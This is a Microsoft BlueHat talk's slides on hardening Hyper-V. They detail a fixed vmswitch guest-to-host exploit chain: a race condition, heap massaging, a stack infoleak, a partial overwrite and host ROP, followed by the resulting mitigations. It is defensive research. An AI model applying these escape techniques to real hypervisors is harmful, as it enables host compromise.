Hardening Hyper-V through
offensive security research
Jordan Rabet, Microsoft OSR
Live demo!
Note: all vulnerabilities mentioned in this talk have been addressed
Hyper-V 101
Hyper-V architecture: layout
[Diagram: the hypervisor runs on the hardware (CPUs, storage, network card, physical memory) and exposes hypercalls, an address manager, MSRs and more; a Host OS and a Guest OS each run on top of it with their own kernel mode and user mode, connected by vmbus.]
Hyper-V architecture: accessing hardware resources from the Guest OS
[Diagram: foo.exe in guest user mode issues I/O through the guest I/O stack to storVSC in the guest kernel; storVSC tunnels the request over vmbus to storVSP in the host kernel, which services it through the host I/O stack and the physical hardware (storage, network card, physical memory).]
vmbus internals: small packet
[Diagram: the guest-side VSC and the host-side VSP (vmbus / vmbusr) exchange packets through a shared virtual ringbuffer. On the guest side the ringbuffer is reached through Guest Virtual Addresses (GVA) backed by Guest Physical Addresses (GPA); on the host side through System Virtual Addresses (SVA) backed by System Physical Addresses (SPA); both map onto the same physical memory.]
VSC
vmbusvmbusr
VSP
Packet
Packet
Packet
Packet
Packet
vmbus internals: small packet passing a direct mapping (GPADL)
[Diagram: same layout as above, but the ringbuffer packets now reference a GPADL — a direct mapping of guest physical pages that the host also maps into its own virtual address space.]
VSP case study: vmswitch
vmswitch: virtualized network provider
• vmswitch is a VSP; it lives in the host kernel
• netVSC, in the guest kernel, tunnels network traffic over vmbus to vmswitch
• vmswitch emulates a network card through the RNDIS protocol
[Diagram: guest traffic flows from foo.exe through the guest I/O stack to netVSC, over vmbus to vmswitch, and out through the host I/O stack and network card.]
vmswitch: initialization sequence
[Diagram: during initialization the guest shares a receive buffer and a send buffer with vmswitch; both are visible in guest physical and host physical memory, and vmbus messages coordinate the setup.]
[Diagram: once running, netVSC sends RNDIS requests (e.g. RNDIS QUERY) to vmswitch, and vmswitch returns RNDIS completions (RNDIS CMPLT), with vmbus messages signaling each side.]
vmswitch: sending RNDIS packets — how are RNDIS messages handled?
[Diagram: the guest posts SEND_RNDIS_PKT vmbus messages naming send-buffer sub-allocations (SUBALLOC 0, SUBALLOC 2); the channel thread reads the corresponding RNDIS messages (QUERY, SET, …) out of the send buffer into an RNDIS message queue, and RNDIS worker threads 1 and 2 dequeue them and write RNDIS CMPLT responses into the receive buffer.]
Initialization sequence vulnerability
Messing with the initialization sequence
[Diagram: the guest can send several receive-buffer GPADLs (GPADL 0, 1, 2); vmswitch's receive-buffer pointer is switched from one GPADL to another.]
vmswitch receive buffer update
• The receive buffer update isn't atomic; it happens in three steps:
  1. Update the pointer to the receive buffer
  2. Generate the bounds of the sub-allocations
  3. Update the bounds of the sub-allocations
• There is no locking on the receive buffer, so it can be used in parallel with the update
[Diagram: mid-update, the vmbus channel's receive-buffer pointer already targets GPADL 1 while the sub-allocation bounds still describe GPADL 0.]
Receive buffer race condition
• During this short window, we can have out-of-bounds sub-allocations
• This results in a useful out-of-bounds write if:
  1. We can control the data being written
  2. We can win the race
  3. We can place a corruption target adjacent to the receive buffer
Exploiting the vulnerability
• Controlling what's written out-of-bounds?
• Winning the race?
• Finding a reliable corruption target?
Controlling the OOB write contents
• OOB write contents: RNDIS control message responses
• RNDIS_QUERY_MSG messages can return large buffers of data
Offset  Size  Field
  0      4    MessageType
  4      4    MessageLength
  8      4    RequestId
 12      4    Status
 16      4    InformationBufferLength
 20      4    InformationBufferOffset
Exploiting the vulnerability
• Controlling what's written out-of-bounds ✓
• Winning the race?
• Finding a reliable corruption target?
vmswitch: handling RNDIS messages is asynchronous, but not really
[Diagram: the channel thread queues RNDIS MSG 0, 1 and 2; worker thread 1 writes the CMPLT for MSG 0 and then blocks waiting on the MSG 0 ack from the guest, worker thread 2 does the same for MSG 1, and the rest of the queue stalls behind them.]
Winning the race: delaying one RNDIS message?
• Can’t have RNDIS messages continuously write to the receive buffer
• But we don’t need continuous RNDIS messages – we just need one
• Can we send an RNDIS message and have it be processed in a delayed way?
• No by-design way of delaying RNDIS messages…
• …but not all messages require an ack from the guest
• Example: malformed RNDIS_KEEPALIVE_MSG message
• Idea: “cascade of failure”
• Block off all RNDIS worker threads
• Chain N malformed RNDIS_KEEPALIVE_MSG messages
• Append a single valid RNDIS message
23
The Cascade Of Failure: making the host race itself
[Diagram: both RNDIS worker threads are blocked, waiting on the guest's acks for MSG 0 and MSG 1; behind them the channel thread has queued malformed keepalives (MSG 3-7) followed by one valid message (MSG 8); MSG 8's CMPLT is written to the receive buffer after a controlled delay.]
Winning the race: configuring the delay
• We can delay the event by N time units, but what’s N’s value?
• We have a limited number of tries: need to be smart
• Can we distinguish between race attempt outcomes?
• If so we could search for the right N
• If we’re too early, increase N
• If we’re too late, decrease N
• If we’re just right… celebrate ☺
25
[Diagram: the three outcomes are distinguishable by where the RNDIS CMPLT lands — too early: written into the old buffer (GPADL 0), before the pointer update; too late: written safely within the new buffer (GPADL 1), after the bounds update; just right: written via the new pointer with the stale bounds, i.e. out of bounds.]
Exploiting the vulnerability
• Controlling what's written out-of-bounds ✓
• Winning the race ✓
• Finding a reliable corruption target?
Finding a target: other GPADL/MDLs and… stacks
0: kd> !address
...
ffffdd80`273bb000 ffffdd80`273c1000 0`00006000 SystemRange Stack Thread: ffffc903f188b080
ffffdd80`273c1000 ffffdd80`273c6000 0`00005000 SystemRange
ffffdd80`273c6000 ffffdd80`273cc000 0`00006000 SystemRange Stack Thread: ffffc903eed10800
ffffdd80`273cc000 ffffdd80`273cf000 0`00003000 SystemRange
ffffdd80`273cf000 ffffdd80`273d5000 0`00006000 SystemRange Stack Thread: ffffc903f182b080
ffffdd80`273d5000 ffffdd80`27606000 0`00231000 SystemRange
ffffdd80`27606000 ffffdd80`2760c000 0`00006000 SystemRange Stack Thread: ffffc903f181f080
ffffdd80`2760c000 ffffdd80`2760d000 0`00001000 SystemRange
ffffdd80`2760d000 ffffdd80`27613000 0`00006000 SystemRange Stack Thread: ffffc903ee878080
ffffdd80`27613000 ffffdd80`27625000 0`00012000 SystemRange
ffffdd80`27625000 ffffdd80`2762b000 0`00006000 SystemRange Stack Thread: ffffc903ee981080
ffffdd80`2762b000 ffffdd80`2762c000 0`00001000 SystemRange
ffffdd80`2762c000 ffffdd80`27632000 0`00006000 SystemRange Stack Thread: ffffc903f1bc64c0
...
28
Finding a target: kernel stacks
• Windows kernel stacks
• Fixed 7-page allocation size
• 6 pages of stack space
• 1 guard page at the bottom
• Allocated in the SystemPTE region
• Great corruption target if within range – gives instant ROP
• Problems
• How does the SystemPTE region allocator work?
• Can we reliably place a stack at a known offset from our receive buffer?
• Can we even “place” a stack? How do we spawn threads?
29
Allocation bitmap
• Bitmap based
• Each bit represents a page
• A 0 bit means the page is free, a 1 bit means it's allocated
• Uses a “hint” for allocation
• Scans bitmap starting from hint
• Wraps around bitmap if needed
• Places hint at tail of successful allocations
• Bitmap is expanded if no space is found
SystemPTE allocator
Free page
Allocated page
Bitmap hint
30
SystemPTE allocator examples
• Example 1: allocating 5 pages
• Example 2: allocating 5 pages again
• Example 3: allocating 17 pages
[Diagrams: each request scans the bitmap from the hint; the hint moves to the tail of every successful allocation, and the 17-page request wraps around the bitmap to find a large-enough run of free pages.]
SystemPTE massaging: allocation primitives
• Receive/send buffers: can map any number of arbitrarily sized MDLs
• (“arbitrary”: still have size/number limits, but they’re pretty high)
• Some vmswitch messages use System Worker Threads
• NT-maintained thread pool
• More threads added to the pool when others are busy
• Idea: trigger many async tasks quickly in a row
• If enough are queued, more threads are spawned
• Helper: deadlock bug in async task lets us lock existing worker threads
• As a result: we can spray a handful of kernel stacks
34
SystemPTE massaging strategy
1. Spray 1MB buffers
2. Allocate a 2MB - 1 page buffer
   • (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB - 7 pages buffer
5. Spray stacks
Two possible outcomes, both manageable.
[Diagrams, outcome #1: the sequence carves up the freshly expanded 2MB region so that a sprayed thread stack lands in the 7-page hole immediately after a replaceable receive buffer.]
Exploiting the vulnerability
• Controlling what's written out-of-bounds ✓
• Winning the race ✓
• Finding a reliable corruption target ✓
• Bypassing KASLR?
Bypassing KASLR
nvsp_message struct
• Represents messages sent to/from vmswitch over vmbus
43
struct nvsp_message {
struct nvsp_message_header hdr;
union nvsp_all_messages msg;
} __packed;
[Diagram: two instances of nvsp_message — msg.send_ndis_ver (hdr.msg_type = NVSP_MSG1_TYPE_SEND_NDIS_VER, ndis_major_ver, ndis_minor_ver) and msg.send_rndis_pkt_complete (hdr.msg_type = NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE, status); both occupy only a small part of sizeof(nvsp_message).]
Infoleak
[Diagram: the completion reply is hdr.msg_type and status, followed by 32 uninitialized stack bytes.]
• nvsp_message is allocated on the stack
• Only the first 8 bytes are initialized
• sizeof(nvsp_message) bytes are returned
→ 32 bytes of uninitialized stack memory are sent back to the guest
→ we can leak a vmswitch return address
→ we have enough to build a ROP chain and overwrite a kernel thread stack!
Bypassing KASLR without an infoleak
• Our infoleak applied to Windows Server 2012 R2, but not Windows 10
• Oops
• How do we deal with KASLR without an infoleak?
• KASLR randomizes most module bases only at a 0x10000-byte granularity
• As a result, partial overwrites are an option
• Example:
• Return address is: 0xfffff808e059f3be (RndisDevHostDeviceCompleteSetEx+0x10a)
• Corrupt it to: 0xfffff808e04b8705 (ROP gadget: pop r15; ret;)
• Can only do a single partial overwrite though… is that useful?
• Only one partial overwrite because our OOB write is contiguous
46
SystemPTE massaging, revisited
[Diagram: the massaged layout now places the replaceable receive buffer, then the target thread stack, with a send buffer mapped immediately after the target stack.]
Partial overwrite
• What if we use it to get RSP into our send buffer?
• Target return address: 0xFFFFF808E059F3BE
• We corrupt it to: 0xFFFFF808E059DA32
• The epilogue at that address does, in effect, RSP += 0xE78:

lea r11, [rsp+0E50h]
mov rbx, [r11+38h]
mov rbp, [r11+40h]
mov rsp, r11
...
ret

• This moves RSP into our send buffer… which is shared with the guest
[Diagram: the kernel thread stack ends at FFFFC500F6000000, where the shared send buffer begins; the return address at FFFFC500F5FFF800 is corrupted from 0xFFFFF808E059F3BE to 0xFFFFF808E059DA32, pivoting RSP into the shared buffer.]
Host kernel stack in shared memory: what now?
1. The host CPU core throws a General Protection Fault (GPF)
• No KASLR bypass means the RET instruction will necessarily cause a fault
2. The address where the GPF happened is dumped to the stack
• In shared memory! We can read it, and that’s our KASLR bypass
3. Windows executes its GPF handler, still with the stack in shared memory
4. As attackers, we can:
   1. Locate valid ROP gadgets thanks to the addresses dumped to the stack
   2. Manipulate the stack as the exception handler is being executed
      • This includes exception records and, of course, other return addresses
5. As a result, we get ROP execution in the host ☺
49
Demo time
Hardening Hyper-V: breaking the chain
1. Vulnerability discovery → targeted, continuous internal code review effort
2. Exploitation → break exploit techniques
3. Post-exploitation → make components less attractive targets, invest in detection
Hardening: kernel stack isolation
To prevent overflowing into kernel stacks, we’ve moved them to their own region
0: kd> !address
...
ffffae8f`050a8000 ffffae8f`050a9000 0`00001000 SystemRange
ffffae8f`050a9000 ffffae8f`050b0000 0`00007000 SystemRange Stack Thread: ffffbc8934d51700
ffffae8f`050b0000 ffffae8f`050b1000 0`00001000 SystemRange
ffffae8f`050b1000 ffffae8f`050b8000 0`00007000 SystemRange Stack Thread: ffffbc8934d55700
ffffae8f`050b8000 ffffae8f`050b9000 0`00001000 SystemRange
ffffae8f`050b9000 ffffae8f`050c0000 0`00007000 SystemRange Stack Thread: ffffbc8934d59700
ffffae8f`050c0000 ffffae8f`050c1000 0`00001000 SystemRange
ffffae8f`050c1000 ffffae8f`050c8000 0`00007000 SystemRange Stack Thread: ffffbc8934d5d700
...
53
Hardening: other kernel mitigations
• Hypervisor-enforced Code Integrity (HVCI)
• Attackers can’t inject arbitrary code into Host kernel
• Kernel-mode Control Flow Guard (KCFG)
• Attackers can’t achieve kernel ROP by hijacking function pointers
• Work is being done to enable these features by default
• Future hardware security features: CET
• Hardware shadow stacks to protect return addresses and prevent ROP
54
Hyper-V architecture: virtualization providers can be in user mode
[Diagram: VSMB is serviced by VMWP.exe in host user mode; guest I/O travels over vmbus to VMWP rather than to a kernel-mode VSP.]
Hardening: VM Worker Process
• Improved sandbox
• Removed SeImpersonatePrivilege
• Improved RCE mitigations
• Enabled CFG export suppression
• Large reduction in number of valid CFG targets
• Enabled “Force CFG”
• Only CFG-enabled modules can be loaded into VMWP
• Several Hyper-V components are being moved into VMWP rather than the kernel
56
The Hyper-V bounty program
• Up to $250,000 payout
• Looking for code execution, infoleaks and denial of service issues
• https://technet.microsoft.com/en-us/mt784431.aspx
• Getting started
• Joe Bialek and Nicolas Joly’s talk: “A Dive in to Hyper-V Architecture &
Vulnerabilities”
• Hyper-V Linux integration services
• Open-source, well-commented code available on GitHub
• Good way to understand VSP interfaces and experiment!
• Public symbols for some Hyper-V components
57
Thank you for your time
Special thanks to Matt Miller, David Weston, the Hyper-V team, the
vmswitch team, the MSRC team and all my OSR buddies
58
BlueHat v18 || Hardening hyper-v through offensive security research
Appendix
Hyper-V architecture: VMWP compromise
• A malicious guest compromises VMWP through VSMB: the host is technically compromised, but the attacker is limited to VMWP's user mode
[Diagram: the guest reaches VMWP.exe over vmbus; the compromise stays in host user mode.]
Hyper-V architecture: VMWP to host kernel compromise
• The attacker escapes VMWP's user mode through a local NT kernel or driver exploit
[Diagram: from VMWP.exe the attacker pivots into the host kernel.]
Hyper-V architecture: host kernel compromise through a VSP
• The attacker goes for the host kernel directly through a VSP's attack surface (e.g. storVSP)
Hyper-V architecture: hypervisor compromise
• The attacker compromises the hypervisor, either directly from the guest or through the host
vmswitch initialization: NVSP_MSG_TYPE_INIT, NVSP_MSG1_TYPE_SEND_NDIS_VER, NVSP_MSG1_TYPE_SEND_RECV_BUF, NVSP_MSG1_TYPE_SEND_SEND_BUF, NVSP_MSG5_TYPE_SUBCHANNEL
[Diagram: the initialization messages set up the receive buffer, the send buffer and up to three subchannels, each subchannel with its own vmbus buffer shared between guest and host physical memory.]
vmswitch: how are RNDIS messages handled? (detail)
[Diagram: same flow as before, additionally showing that the channel thread consumes vmbus channel messages in batches — SEND_RNDIS_PKT for SUBALLOC 0 and SUBALLOC 2 — before the RNDIS worker threads pick up the queued RNDIS messages and write their CMPLTs.]
vmswitch state machine
[Diagram: states 0 None → 1 Initializing (on NVSP_MSG_TYPE_INIT) → 2 Operational (on RNDIS_INITIALIZE_MSG) → 3 Halted (on RNDIS_HALT_MSG); a table maps each NVSP message type (NVSP_MSG_TYPE_INIT, NVSP_MSG1_TYPE_SEND_NDIS_VER, NVSP_MSG1_TYPE_SEND_RECV_BUF, NVSP_MSG1_TYPE_REVOKE_RECV_BUF, NVSP_MSG1_TYPE_SEND_SEND_BUF, NVSP_MSG1_TYPE_REVOKE_SEND_BUF, NVSP_MSG1_TYPE_SEND_RNDIS_PKT, NVSP_MSG5_TYPE_SUBCHANNEL) to the states in which it is accepted.]
vmswitch takeaways
• Send/receive buffers are used to transfer many messages at a time
• Opposite end needs to be prompted over vmbus to read from them
• vmswitch relies on different threads for different tasks
• vmbus dispatch threads
• Setup send/receive buffers, subchannels…
• Read RNDIS messages from send buffer
• The system worker threads
• Process RNDIS messages
• Write responses to receive buffer
• Subchannels only increase bandwidth in that they allow us to alert
the opposite end more often
68
Winning the race: continuous writing?
• Easy way to win the race: queue up RNDIS messages and keep having them write to the receive buffer continuously
• Doesn't work: the RNDIS threads are blocked until the ack from the guest
• The ack and the buffer replacement happen on the same channel: they can't happen simultaneously…
• …unless we use subchannels! Multiple channels = simultaneity
• …but we can't, because of the state machine
Winning the race: configuring the delay
• We can delay the event by N time units, but what’s N’s value?
• We have a limited number of tries: need to be smart
• Can we distinguish between race attempt outcomes?
• Yes
• If we’re too early, increase N
• If we’re too late, decrease N
• If we’re just right… celebrate ☺
• In practice we usually converge to the right N in <10 attempts
• N can vary from machine to machine and session to session
71
Finding a target: where’s our buffer?
• GPADL mapping
• GPADL PAs mapped into an MDL using VmbChannelMapGpadl
• MDL then mapped to VA space using MmGetSystemAddressForMdlSafe
• Where are MDLs mapped to? The SystemPTE region
• What’s mapped adjacent to our MDL?
• ...other MDLs
0: kd> !address @@c++(ReceiveBuffer)
Usage:
Base Address: ffffdd80`273d5000
End Address: ffffdd80`27606000
Region Size: 00000000`00231000
VA Type: SystemRange
72
Finding a target: allocation primitives
• Receive/send buffers: we can map an arbitrary number of arbitrarily sized MDLs
• (“arbitrary”: still have size/number limits, but they’re pretty high)
• Receive/send buffers: can be revoked
• NVSP_MSG1_TYPE_REVOKE_RECV_BUF and NVSP_MSG1_TYPE_REVOKE_SEND_BUF
• Since replacing buffers is a bug, we can only revoke the last one sent for each
• We have pretty good allocation and freeing primitives for manipulating the region
• But we need a way to allocate new stacks if we want to target them…
• Can we spray host-side threads?
73
Finding a target: stack allocation primitives
• vmswitch relies on System Worker Threads to perform asynchronous tasks
• NT-maintained thread pool
• Additional threads are added to the pool when all others are busy
• Basic idea: trigger an asynchronous task many times in rapid succession
• If enough tasks are queued quickly enough, threads will be spawned
• Several vmswitch messages rely on System Worker Threads
• In this exploit we use NVSP_MSG2_TYPE_SEND_NDIS_CONFIG
• Problem
• This method usually lets us create about 5 threads
• What if there are already a lot of threads in the system worker pool?
• Would be nice to be able to terminate them…
74
Finding a target: stack allocation primitives
• There’s no by-design way to terminate worker threads from a guest
• But there are bugs we can use! ☺
• NVSP_MSG1_TYPE_REVOKE_SEND/RECV_BUF
• Revocation done on system worker threads
• Deadlock bug: when multiple revocation messages are handled, all but the last system worker thread would be deadlocked forever
• We can use this to lock out an “arbitrary” number of system worker
threads
• We now have a limited thread stack spray!
75
SystemPTE massaging strategy — outcome #2
(Same steps 1-5 as in outcome #1.)
[Diagrams: the allocations land in a different arrangement, but a sprayed thread stack still ends up at a fixed, known offset after a replaceable receive buffer.]
Finding a target: SystemPTE massaging
• After massaging, we know a stack is at one of two offsets from the receive buffer
• Either 3MB - 6 pages away or 4MB - 6 pages away
• Since we can perform the race reliably, we can just try both possible offsets
• Note: doing the race requires revoking and re-mapping the receive buffer
• We can do this because the SystemPTE bitmap frees our 2MB block and reuses it for the next 2MB block allocation
• As a result, we're almost guaranteed to fall back into the same slot if we're fast enough
• We can overwrite a stack, but what do we write?
• Overwriting return addresses requires a host KASLR bypass
• Easiest way to do this: find an infoleak vulnerability
81
Putting it all together
• We can leak 32 bytes of host stack memory
• We can leak a vmswitch return address
• With a return address we can build a ROP chain ☺
• Final exploit:
• Use infoleak to locate vmswitch
• Use information to build a ROP chain
• We don’t know for sure which stack we’re corrupting, so we prepend a ROP NOP-sled
• (that just means a series of pointers to RET instructions in a row)
• Perform host SystemPTE massaging
• Use race condition to overwrite host kernel thread stack with ROP chain
82
What about security? Host OS mitigations

Host OS kernel:
• Full KASLR
• Kernel Control Flow Guard (optional)
• Hypervisor-enforced Code Integrity (HVCI) (optional)
• No sandbox

VM Worker Process:
• ASLR
• Control Flow Guard (CFG)
• Arbitrary Code Guard (ACG)
• Code Integrity Guard (CIG)
• Win32k lockdown
BlueHat Seattle 2019 || Keynote
BlueHat Seattle 2019 || Guarding Against Physical Attacks: The Xbox One Story
BlueHat Seattle 2019 || Kubernetes Practical Attack and Defense
BlueHat Seattle 2019 || Open Source Security, vulnerabilities never come alone
BlueHat Seattle 2019 || Modern Binary Analysis with ILs
BlueHat Seattle 2019 || Don't forget to SUBSCRIBE.
BlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure AD
BlueHat Seattle 2019 || Autopsies of Recent DFIR Investigations
BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...
BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...
BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...
BlueHat v18 || First strontium uefi rootkit unveiled
BlueHat v18 || WSL reloaded - Let's try to do better fuzzing
BlueHat v18 || The hitchhiker's guide to north korea's malware galaxy
BlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windows
BlueHat v18 || Memory resident implants - code injection is alive and well
BlueHat v18 || Massive scale usb device driver fuzz without device
BlueHat v18 || Modern day entomology - examining the inner workings of the bu...
BlueHat v18 || The matrix has you - protecting linux using deception

Recently uploaded (20)

DOCX
search engine optimization ppt fir known well about this
PDF
The influence of sentiment analysis in enhancing early warning system model f...
PDF
sbt 2.0: go big (Scala Days 2025 edition)
PPTX
The various Industrial Revolutions .pptx
PDF
1 - Historical Antecedents, Social Consideration.pdf
PDF
Hindi spoken digit analysis for native and non-native speakers
PDF
A Late Bloomer's Guide to GenAI: Ethics, Bias, and Effective Prompting - Boha...
PPTX
Chapter 5: Probability Theory and Statistics
PPTX
Final SEM Unit 1 for mit wpu at pune .pptx
PPTX
MicrosoftCybserSecurityReferenceArchitecture-April-2025.pptx
PDF
A review of recent deep learning applications in wood surface defect identifi...
PPTX
Configure Apache Mutual Authentication
PDF
UiPath Agentic Automation session 1: RPA to Agents
PDF
Hybrid horned lizard optimization algorithm-aquila optimizer for DC motor
PPTX
Benefits of Physical activity for teenagers.pptx
PDF
OpenACC and Open Hackathons Monthly Highlights July 2025
PDF
Two-dimensional Klein-Gordon and Sine-Gordon numerical solutions based on dee...
PPTX
Microsoft Excel 365/2024 Beginner's training
PDF
From MVP to Full-Scale Product A Startup’s Software Journey.pdf
PDF
STKI Israel Market Study 2025 version august
search engine optimization ppt fir known well about this
The influence of sentiment analysis in enhancing early warning system model f...
sbt 2.0: go big (Scala Days 2025 edition)
The various Industrial Revolutions .pptx
1 - Historical Antecedents, Social Consideration.pdf
Hindi spoken digit analysis for native and non-native speakers
A Late Bloomer's Guide to GenAI: Ethics, Bias, and Effective Prompting - Boha...
Chapter 5: Probability Theory and Statistics
Final SEM Unit 1 for mit wpu at pune .pptx
MicrosoftCybserSecurityReferenceArchitecture-April-2025.pptx
A review of recent deep learning applications in wood surface defect identifi...
Configure Apache Mutual Authentication
UiPath Agentic Automation session 1: RPA to Agents
Hybrid horned lizard optimization algorithm-aquila optimizer for DC motor
Benefits of Physical activity for teenagers.pptx
OpenACC and Open Hackathons Monthly Highlights July 2025
Two-dimensional Klein-Gordon and Sine-Gordon numerical solutions based on dee...
Microsoft Excel 365/2024 Beginner's training
From MVP to Full-Scale Product A Startup’s Software Journey.pdf
STKI Israel Market Study 2025 version august

BlueHat v18 || Hardening hyper-v through offensive security research

  • 1. Hardening Hyper-V through offensive security research. Jordan Rabet, Microsoft OSR. Live demo! Note: all vulnerabilities mentioned in this talk have been addressed.
  • 4. Hyper-V architecture: layout. [Diagram: host OS and guest OS, each split into user mode and kernel mode, connected by vmbus; both run on the hypervisor (hypercalls, address manager, MSRs, CPUs) above the hardware (storage, network card, physical memory).]
  • 5. Hyper-V architecture: accessing hardware resources from Guest OS. [Diagram: foo.exe in the guest goes through the guest I/O stack to storVSC, across vmbus to storVSP in the host kernel's I/O stack, which reaches the physical storage hardware.]
  • 6. vmbus internals: small packet. [Diagram: the guest-side VSC (vmbus) and host-side VSP (vmbusr) exchange packets through a shared virtual ringbuffer; guest virtual addresses (GVA) map to guest physical addresses (GPA), system virtual addresses (SVA) to system physical addresses (SPA), all backed by the same physical memory.]
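The shared-ringbuffer idea on this slide can be sketched as a pair of indices over a shared region. This is a simplified model for illustration, not the actual vmbus ring layout; all names are made up:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define RING_SIZE 4096

/* Simplified one-directional shared ring: the writer (e.g. the guest VSC)
 * advances write_index, the reader (host VSP) advances read_index. The real
 * vmbus ring lives in pages shared between guest and host. */
struct ring {
    uint32_t write_index;
    uint32_t read_index;
    uint8_t  data[RING_SIZE];
};

static int ring_write(struct ring *r, const void *pkt, uint32_t len) {
    uint32_t used = (r->write_index - r->read_index) % RING_SIZE;
    if (len > RING_SIZE - 1 - used)
        return -1;                      /* ring full */
    for (uint32_t i = 0; i < len; i++)  /* copy with wraparound */
        r->data[(r->write_index + i) % RING_SIZE] = ((const uint8_t *)pkt)[i];
    r->write_index = (r->write_index + len) % RING_SIZE;
    return 0;
}

static int ring_read(struct ring *r, void *out, uint32_t len) {
    uint32_t avail = (r->write_index - r->read_index) % RING_SIZE;
    if (len > avail)
        return -1;                      /* not enough data */
    for (uint32_t i = 0; i < len; i++)
        ((uint8_t *)out)[i] = r->data[(r->read_index + i) % RING_SIZE];
    r->read_index = (r->read_index + len) % RING_SIZE;
    return 0;
}
```

In the real setup each side is additionally signaled over vmbus to go read the ring, rather than polling.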
  • 7. vmbus internals: small packet passing a direct mapping (GPADL). [Diagram: same layout as the previous slide, but the packet carries a GPADL that maps a region of guest physical memory directly into the host's virtual address space.]
  • 8. VSP case study: vmswitch
  • 9. vmswitch: virtualized network provider. vmswitch is a VSP and lives in the host kernel; netVSC tunnels traffic over vmbus to vmswitch; vmswitch emulates a network card through the RNDIS protocol. [Diagram: guest netVSC and host vmswitch on either side of vmbus, backed by the physical network card.]
  • 10. vmswitch: initialization sequence. [Diagram: guest and host exchange vmbus messages to establish a shared Send Buffer and Receive Buffer, allocated in guest physical memory and mapped into host physical memory.]
  • 11. vmswitch: sending RNDIS packets. [Diagram: netVSC places an RNDIS QUERY in the send buffer and signals vmswitch over vmbus; vmswitch writes the RNDIS CMPLT response into the receive buffer.]
  • 12. vmswitch: how are RNDIS messages handled? [Diagram: a channel thread reads SEND_RNDIS_PKT messages (each referencing a send-buffer sub-allocation) from the vmbus channel and queues the contained RNDIS QUERY/SET messages; RNDIS worker threads dequeue them and write RNDIS CMPLT responses into the receive buffer.]
  • 14. Messing with the initialization sequence. [Diagram: the guest supplies several receive-buffer GPADLs (GPADL 0, 1, 2) in a row, while the host's Receive Buffer Pointer still references an earlier mapping.]
  • 15. vmswitch receive buffer update. The receive buffer update isn't atomic: 1. update the pointer to the buffer; 2. generate the bounds of the sub-allocations; 3. update the bounds of the sub-allocations. There is no locking on the receive buffer, so it could be used in parallel with the update.
  • 16. vmswitch receive buffer update. [Diagram: the vmbus channel's Receive Buffer Pointer is switched from GPADL 0 to GPADL 1 (step 1) before the sub-allocation bounds are regenerated and updated (steps 2 and 3).]
  • 17. vmswitch receive buffer update: receive buffer race condition. During this short window, we can have out-of-bounds sub-allocations. This results in a useful out-of-bounds write if: 1. we can control the data being written; 2. we can win the race; 3. we can place a corruption target adjacent to the receive buffer.
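The non-atomic update above can be modeled in a few lines. This is an illustrative sketch, not vmswitch code; all names and sizes are made up:

```c
#include <assert.h>
#include <stdint.h>

/* Illustrative model: sub-allocation slots are fixed-size carve-outs of the
 * receive buffer. If the base mapping is swapped to a smaller GPADL (step 1)
 * while the slot bounds still describe the old one (steps 2-3 pending), a
 * slot write can land past the end of the new mapping. */
struct rxbuf {
    uint8_t *base;       /* step 1 updates this                */
    uint32_t size;       /* size of the currently mapped GPADL */
    uint32_t slot_size;  /* steps 2-3 update the slot bounds   */
    uint32_t slot_count;
};

/* Returns 1 if writing `len` bytes into slot `idx` stays inside the mapping. */
static int slot_write_in_bounds(const struct rxbuf *b, uint32_t idx, uint32_t len) {
    uint64_t end = (uint64_t)idx * b->slot_size + len;
    return end <= b->size;
}
```

The exploit's job is to get a controlled write issued exactly while the structure is in the inconsistent middle state.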
  • 18. Exploiting the vulnerability Controlling what’s written out-of-bounds Winning the race Finding a reliable corruption target ? ? ?
  • 19. Exploiting the vulnerability Controlling what’s written out-of-bounds Winning the race Finding a reliable corruption target ? ? ?
  • 20. Controlling the OOB write contents. The OOB write contents are RNDIS control message responses, and RNDIS_QUERY_MSG messages can return large buffers of data. Response header layout (offset, size, field): 0, 4, MessageType; 4, 4, MessageLength; 8, 4, RequestId; 12, 4, Status; 16, 4, InformationBufferLength; 20, 4, InformationBufferOffset.
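The header table on this slide maps directly onto a C struct. This is a sketch of the layout as shown, not the vmswitch source; field names follow the RNDIS convention:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* RNDIS query-complete header, per the offsets in the slide's table. */
struct rndis_query_complete {
    uint32_t MessageType;             /* offset 0  */
    uint32_t MessageLength;           /* offset 4  */
    uint32_t RequestId;               /* offset 8  */
    uint32_t Status;                  /* offset 12 */
    uint32_t InformationBufferLength; /* offset 16 */
    uint32_t InformationBufferOffset; /* offset 20 */
};
/* The information buffer follows the header at InformationBufferOffset; a
 * large, guest-influenced InformationBufferLength is what turns the response
 * into a sizeable, content-controlled OOB write payload. */
```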
  • 21. Exploiting the vulnerability Controlling what’s written out-of-bounds Winning the race Finding a reliable corruption target ? ?
  • 22. vmswitch: handling RNDIS messages is asynchronous, but not really. [Diagram: the channel thread queues RNDIS MSG 0-2; worker thread 1 processes MSG 0 and worker thread 2 processes MSG 1, but each then blocks waiting on the guest's ack of its CMPLT before taking another message.]
  • 23. Winning the race: delaying one RNDIS message? • Can’t have RNDIS messages continuously write to the receive buffer • But we don’t need continuous RNDIS messages – we just need one • Can we send an RNDIS message and have it be processed in a delayed way? • No by-design way of delaying RNDIS messages… • …but not all messages require an ack from the guest • Example: malformed RNDIS_KEEPALIVE_MSG message • Idea: “cascade of failure” • Block off all RNDIS worker threads • Chain N malformed RNDIS_KEEPALIVE_MSG messages • Append a single valid RNDIS message 23
  • 24. The Cascade Of Failure: making the host race itself. [Diagram: worker threads 1 and 2 are blocked waiting on guest acks for MSG 0 and MSG 1; the queued malformed messages (MSG 3-7) are consumed in turn, so the final valid message (MSG 8) is written to the receive buffer after a controlled delay.]
  • 25. Winning the race: configuring the delay • We can delay the event by N time units, but what’s N’s value? • We have a limited number of tries: need to be smart • Can we distinguish between race attempt outcomes? • If so we could search for the right N • If we’re too early, increase N • If we’re too late, decrease N • If we’re just right… celebrate ☺ 25
